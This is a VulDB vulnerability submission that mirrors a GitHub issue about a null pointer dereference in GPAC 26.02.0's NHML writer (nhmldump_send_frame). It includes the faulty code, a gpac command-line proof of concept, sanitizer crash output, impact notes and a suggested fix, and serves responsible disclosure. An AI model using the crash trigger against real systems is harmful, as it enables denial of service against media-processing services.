Submit #850391: gpac v26.02.0 NULL Pointer Dereferenceinfo

Titelgpac v26.02.0 NULL Pointer Dereference
Beschreibung**Disclosure:** This report was drafted with AI assistance and manually reviewed/verified before submission. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at https://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 ## Summary A null pointer dereference vulnerability exists in `src/filters/write_nhml.c` in the `nhmldump_send_frame()` function. The latest upstream build at commit `db3815307d1594fc34cb757d4509834a9d2e12bf` still triggers UBSan on the attached PoC/harness input. ## Vulnerability Details **Validation Target:** Executable (`gpac` CLI) **Location:** `src/filters/write_nhml.c:882` **Vulnerable Code:** ```c } else if (ctx->is_stpp && ctx->nhmlonly) { sprintf(nhml, "<NHNTSubSample><![CDATA[\n"); gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml)); gf_bs_write_data(ctx->bs_w, data, data_size); sprintf(nhml, "]]></NHNTSubSample>\n"); gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml)); } if (ctx->filep) { // dump sample opening tag ``` The sanitizer-confirmed reproducer reaches `nhmldump_send_frame()` on the latest upstream build and reports the fault at or immediately under this location. ## Root Cause The code assumes required state is present and dereferences a pointer that can remain NULL for malformed input or partially initialized objects. ## Steps to Reproduce ### 1. Prepare the attached PoC / harness artifacts Use the following already-validated artifacts from the public validation repository as the attachment set for the issue: - [run_stpp_null_packet.sh](https://github.com/Bin-infinite/vuln-validations/blob/main/gpac/latest/case-004/pocs/run_stpp_null_packet.sh) - [poc-command.txt](https://github.com/Bin-infinite/vuln-validations/blob/main/gpac/latest/case-004/inputs/poc-command.txt) ### 2. Build or use a sanitizer-enabled latest GPAC I reproduced this on latest upstream HEAD `db3815307d1594fc34cb757d4509834a9d2e12bf` with a Clang ASan/UBSan build under Linux. Run the following commands from this validation directory after setting `GPAC_BIN` to the sanitizer-built `gpac` executable and `GPAC_REPO` to the matching GPAC source/build tree. ### 3. Trigger the vulnerability ```bash ASAN_OPTIONS=detect_leaks=0:abort_on_error=1:symbolize=1 UBSAN_OPTIONS=halt_on_error=1:print_stacktrace=1 \ LD_LIBRARY_PATH="$(dirname "$GPAC_BIN")" "$GPAC_BIN" \ 'fin:src=null:pck=10@0:ptime=1/1000:#CodecID=stpp:#StreamType=text' \ 'nhmlw:nhmlonly' -o stpp-null-packet.nhml ``` ## Expected Result GPAC should reject the malformed input or invalid state gracefully without hitting sanitizer diagnostics, leaking memory, or crashing. ## Actual Result ``` utils/bitstream.c:1184:56: runtime error: null pointer passed as argument 2, which is declared to never be null #0 0x7533424fb733 in gf_bs_write_data /tmp/gpac-latest-wt/src/utils/bitstream.c:1184:4 #1 0x7533436f85ac in nhmldump_send_frame /tmp/gpac-latest-wt/src/filters/write_nhml.c:882:3 #2 0x7533436f85ac in nhmldump_process /tmp/gpac-latest-wt/src/filters/write_nhml.c:1028:7 #3 0x75334324f15a in gf_filter_process_task /tmp/gpac-latest-wt/src/filter_core/filter.c:3253:7 #4 0x753343222344 in gf_fs_thread_proc /tmp/gpac-latest-wt/src/filter_core/filter_session.c:2418:3 #5 0x75334321ff34 in gf_fs_run /tmp/gpac-latest-wt/src/filter_core/filter_session.c:2726:3 SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior utils/bitstream.c:1184:56 ``` ## Impact - **Denial of Service**: malformed input can drive a null dereference and terminate the process - **Attack Vector**: attackers can deliver crafted media files or graph descriptions that reach the affected code path ## Suggested Fix Check all pointer-returning helpers and intermediate objects before dereference, and propagate a parse/validation error when required state is missing. ## Environment - GPAC version: master branch / upstream HEAD `db3815307d1594fc34cb757d4509834a9d2e12bf` - OS: Linux - Compiler: Clang with ASan/UBSan (LSan enabled for leak cases)
Quelle⚠️ https://github.com/gpac/gpac/issues/3596
Benutzer
 Kery Qi (UID 94424)
Einreichung06.06.2026 07:40 (vor 30 Tagen)
Moderieren05.07.2026 18:07 (29 days later)
StatusAkzeptiert
VulDB Eintrag376379 [GPAC 26.02.0 Media File src/filters/write_nhml.c nhmldump_send_frame Denial of Service]
Punkte20

Interested in the pricing of exploits?

See the underground prices here!